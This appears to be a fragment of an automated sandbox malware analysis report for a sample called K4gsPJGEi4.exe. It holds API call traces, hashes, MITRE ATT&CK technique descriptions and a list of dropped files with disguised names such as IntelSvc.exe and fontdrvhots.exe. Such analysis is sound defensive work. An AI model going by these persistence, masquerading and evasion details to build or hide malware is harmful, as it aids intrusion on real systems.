Opcode ID: 63ce2b80823d69de86dbf7dcb5ab19004797d4edf83c29046b8da4a46f5ddad8
Instruction ID: 9fbbedca34cb89c55de691502d25219f126107378c52c5549980c5d736f617c7
Opcode Fuzzy Hash: 63ce2b80823d69de86dbf7dcb5ab19004797d4edf83c29046b8da4a46f5ddad8
Instruction Fuzzy Hash: A8010C37D04248AACB11ABA645057DFBF749F55354F1080BBD881B72C2C1B48681C759

Function 0040EFA9 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0040B107,?,?,00000001,?,system,?,boot,?,disabled,?,manual), ref: 0040EFF2
GetLastError.KERNEL32(?,?,?,0040B107,?,?,00000001,?,system,?,boot,?,disabled,?,manual), ref: 0040F003
GetLastError.KERNEL32(?,?,0040B107,?,?,00000001,?,system,?,boot,?,disabled,?,manual,?,auto), ref: 0040F015

Strings

ServicesActive, xrefs: 0040EFAD

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: ServicesActive
API String ID: 1452528299-3071072050
Opcode ID: b15d5e498472cbef90358db768449c7520b3614438626f40c96d2ca4daaed0b2
Instruction ID: bd5a18f3ea91b2463d85ffaae232768501679098d3d51895b7bdacced177ad12
Opcode Fuzzy Hash: b15d5e498472cbef90358db768449c7520b3614438626f40c96d2ca4daaed0b2
Instruction Fuzzy Hash: 29F0C831204221BBC7312B70AC4C9AF7EA8EB8DB71B254675FD02E22E1D7388C409A5D

Function 0040162E Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(?), ref: 00401644
GlobalSize.KERNEL32(?), ref: 0040164D
GlobalUnWire.KERNEL32(?), ref: 00401658
memset.MSVCRT ref: 00401674

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Global$SizeWirememset
String ID:
API String ID: 369488093-0
Opcode ID: 1142e2692c5fd429387c560be0853352a5916a656c27206eab57bacf9329872c
Instruction ID: ef26b8644eb935f89815b46d1f0f2fd43649211328a67e015921de48fb633e31
Opcode Fuzzy Hash: 1142e2692c5fd429387c560be0853352a5916a656c27206eab57bacf9329872c
Instruction Fuzzy Hash: A301A2319002009BCB209B54CD4589F7BFCEF89710724483AE986E3260E335EC518B58

Function 00402883 Relevance: 6.0, APIs: 4, Instructions: 37filetimeCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000104,00000000,00000000,?,00405D87,?,00000000,00000000,00000000,?,?,00405F16,?,?,?,00000000), ref: 00402894
CreateFileA.KERNEL32(00000104,40000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,00405D87,?,00000000,00000000,00000000,?), ref: 004028B2
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00405D87,?,00000000,00000000,00000000,?,?,00405F16,?,?,?), ref: 004028C9
CloseHandle.KERNEL32(00000000,?,00405D87,?,00000000,00000000,00000000,?,?,00405F16,?,?,?,00000000,?,00000104), ref: 004028D2

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateHandleTime
String ID:
API String ID: 1550419386-0
Opcode ID: 4a2ed23af5eb52c2952b978eec6956265176091a0985638fd30eafd8a25ac7df
Instruction ID: fb2271233b795beaa095415a7d1a1cea53f4a84663435d116e0947f59f6f6a06
Opcode Fuzzy Hash: 4a2ed23af5eb52c2952b978eec6956265176091a0985638fd30eafd8a25ac7df
Instruction Fuzzy Hash: A8F06D36500114BBDB211FA6EC0CFCB7E69EB8A761F048131FF14A21E0C671495287D4

Function 00402441 Relevance: 6.0, APIs: 4, Instructions: 31stringCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?), ref: 0040244D
_mbscpy.MSVCRT ref: 00402466
strrchr.MSVCRT ref: 00402474
CreateDirectoryA.KERNEL32(?,00000000), ref: 00402495

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile_mbscpystrrchr
String ID:
API String ID: 3127759436-0
Opcode ID: 77cffd47af9b24f5f7b20cdd958b7e8780a3f06abc67eec3af586855d15e6b2f
Instruction ID: ec200365e1f78e726b41df2e080492369fe3323070ae8e31981c0b27ba37af15
Opcode Fuzzy Hash: 77cffd47af9b24f5f7b20cdd958b7e8780a3f06abc67eec3af586855d15e6b2f
Instruction Fuzzy Hash: FFF0A731500209AADF10AB74DC4ABCA7BA85B00308F0045A1B688E50E2EFF4D9C58B95

Function 00403782 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00403799
??3@YAXPAX@Z.MSVCRT ref: 004037B7

Strings

H, xrefs: 00403792

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??3@InfoMonitor
String ID: H
API String ID: 3476259087-2852464175
Opcode ID: f4d594e0de1939bc7e96b1478809dce165cc8ff3016af223115e7e733f4ed527
Instruction ID: f390d2729d7f761660da0b7f783c23454d0381a1e6576f1d9d8f1ee5a8dd6c8d
Opcode Fuzzy Hash: f4d594e0de1939bc7e96b1478809dce165cc8ff3016af223115e7e733f4ed527
Instruction Fuzzy Hash: 9101D8B35002089FDB10DF65D4809CABBFDEF04724B10C42FE955A76C0D774A9458F55

Function 00401A39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00401A73: FreeLibrary.KERNEL32(?,00401AE5), ref: 00401A7B

GetProcAddress.KERNEL32(?,CreateAssemblyCache), ref: 00401A5F

Strings

fusion.dll, xrefs: 00401A51
CreateAssemblyCache, xrefs: 00401A58

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: CreateAssemblyCache$fusion.dll
API String ID: 3013587201-1145749632
Opcode ID: 8d7c764f10267864cd2eab76513a79911b60bf5455297c3f3f243bf68f17b784
Instruction ID: c0df7c1beb3857032a41c62af633e97de19dc5a42cb3f2816a153b0f5d3f0e06
Opcode Fuzzy Hash: 8d7c764f10267864cd2eab76513a79911b60bf5455297c3f3f243bf68f17b784
Instruction Fuzzy Hash: CCE02635701300AED7209BB1CD01F8773E4EF44B60F00883BE542E60A0C2B4A8408B48

Function 0040DAE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(netapi32.dll,00408258,NetApiBufferFree,?,?,000000FF,?,?,000010FE), ref: 0040DAF0
GetProcAddress.KERNEL32(?,000010FE), ref: 0040DB04

Strings

netapi32.dll, xrefs: 0040DAEB

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: netapi32.dll
API String ID: 2574300362-1182877548
Opcode ID: 867d5529b54e4cf9d1ce1f0f285f1858dba5a66bb2bd9fe02869aab271ed4f6f
Instruction ID: a407341ad5a9efb6d2d65c33acf3046451f78160bbe66394af3058fa4fbcd859
Opcode Fuzzy Hash: 867d5529b54e4cf9d1ce1f0f285f1858dba5a66bb2bd9fe02869aab271ed4f6f
Instruction Fuzzy Hash: F6D09E74B452019AC7009FF1AC48A577EA8AB15742712C436B105E1560DB35D994EB1D

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report K4gsPJGEi4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\IntelSvc.exe

C:\ProgramData\cmdow.exe

C:\ProgramData\screen.exe

C:\Users\Public\IntelSvc.exe

C:\Users\Public\RtkAudio.exe

C:\Users\Public\WinRing0x64.sys

C:\Users\Public\cmdow.exe

C:\Users\Public\config.ini

C:\Users\Public\config.json

C:\Users\Public\screen.exe

C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe

C:\Users\user\AppData\Local\Temp\IntelSvc.exe

C:\Users\user\AppData\Local\Temp\PathView.txt

C:\Users\user\AppData\Local\Temp\PathView1.txt

Windows Analysis Report
K4gsPJGEi4.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre